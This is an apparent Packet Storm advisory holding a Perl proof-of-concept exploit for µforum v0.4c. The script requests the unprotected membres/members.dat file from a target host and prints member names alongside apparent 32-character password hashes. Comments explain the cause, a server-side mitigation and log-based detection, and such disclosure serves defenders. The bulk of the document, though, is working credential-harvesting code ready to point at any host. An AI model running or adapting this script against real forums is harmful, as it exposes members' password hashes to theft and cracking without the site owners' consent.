forumv04c.txt

2006-09-07T00:00:00
ID PACKETSTORM:49710
Type packetstorm
Reporter DarkFig
Modified 2006-09-07T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# Affected.scr..: µforum v0.4c  
# Poc.ID........: 08060901  
# Type..........: Members' passwords are stored in a .dat file not protected by a .htaccess file  
# Risk.level....: Medium  
# Vendor.Status.: Unpatched  
# Src.download..: comscripts.com/scripts/php.forum.1568.html  
# Poc.link......: acid-root.new.fr/poc/08060901.txt  
# Credits.......: DarkFig  
#  
use LWP::UserAgent;  
use HTTP::Request;  
use Getopt::Long;  
use strict;  
  
# Overview: this script builds the URL <host><path>membres/members.dat, sends a
# single HTTP GET for it (no credentials are sent to the target, only optional
# proxy credentials), and prints "name::hash" pairs parsed from the response.
#
# Root cause (per the header above): the forum keeps member credentials in a
# flat .dat file under the web root, and the directory is not protected by a
# .htaccess file, so the web server hands the file to any client.
#
# Mitigation: deny HTTP access to the membres/ directory with a server access
# rule, or keep the data file outside the document root. The header lists the
# vendor status as Unpatched, so a server-side rule is the fix available to
# operators. If the file was reachable, treat the stored hashes as exposed and
# reset member passwords.
#
# Detection: look in web server access logs for GET requests whose path ends
# in membres/members.dat; this script sends the bare User-Agent "Mozilla".

# Print a three-line ASCII banner naming the affected application.
print STDOUT "\n+", '-' x 36, "+\n";
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT '+', '-' x 36, "+\n";

# Options: --host (target), --path (forum base path), --proxh (proxy URL),
# --proxu / --proxp (proxy user / password). The GetOptions result in $opt is
# not inspected afterwards, and no option is checked for presence.
my($host,$path,$proxh,$proxu,$proxp);
my $opt = GetOptions(
'host=s' => \$host,
'path=s' => \$path,
'proxh=s' => \$proxh,
'proxu=s' => \$proxu,
'proxp=s' => \$proxp);

# Default the base path to '/', then append the fixed data-file location.
if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
# The scheme is prepended unless the string contains "http" anywhere
# (the pattern is unanchored).
if($host !~ /http/) {$host = 'http://'.$host;}

# HTTP client: fixed User-Agent "Mozilla", 30 second timeout, optional proxy.
my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $host);
# Proxy basic-auth is attached only when a proxy password was supplied.
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;

# The response status is not checked; whatever body comes back is parsed.
my $res = $ua->request($req);
my $dat = $res->content;
# Split the body on ':' so each quoted value lands in its own fragment.
my @tabl= split(/:/, $dat);

# NOTE(review): the ';a' and ';i' below are literal characters inside the
# patterns, not regex modifiers. They look like the type markers that follow a
# string in PHP serialize() output - presumably the file is a serialized
# array keyed by member name; confirm against the application source.
foreach (@tabl) {
# A quoted string followed by ';a' is printed on a new line as "<value>::".
if($_ =~ /"(.*)";a/){
print "\n".$1.'::';}

# A quoted run of exactly 32 characters from [a-z0-9] followed by ';i' is
# printed after it. The length is consistent with a hex MD5 digest, which the
# page does not confirm.
if($_ =~ /"([a-z0-9]{32})";i/){
print $1;}
}

print "\n";
exit(0);
`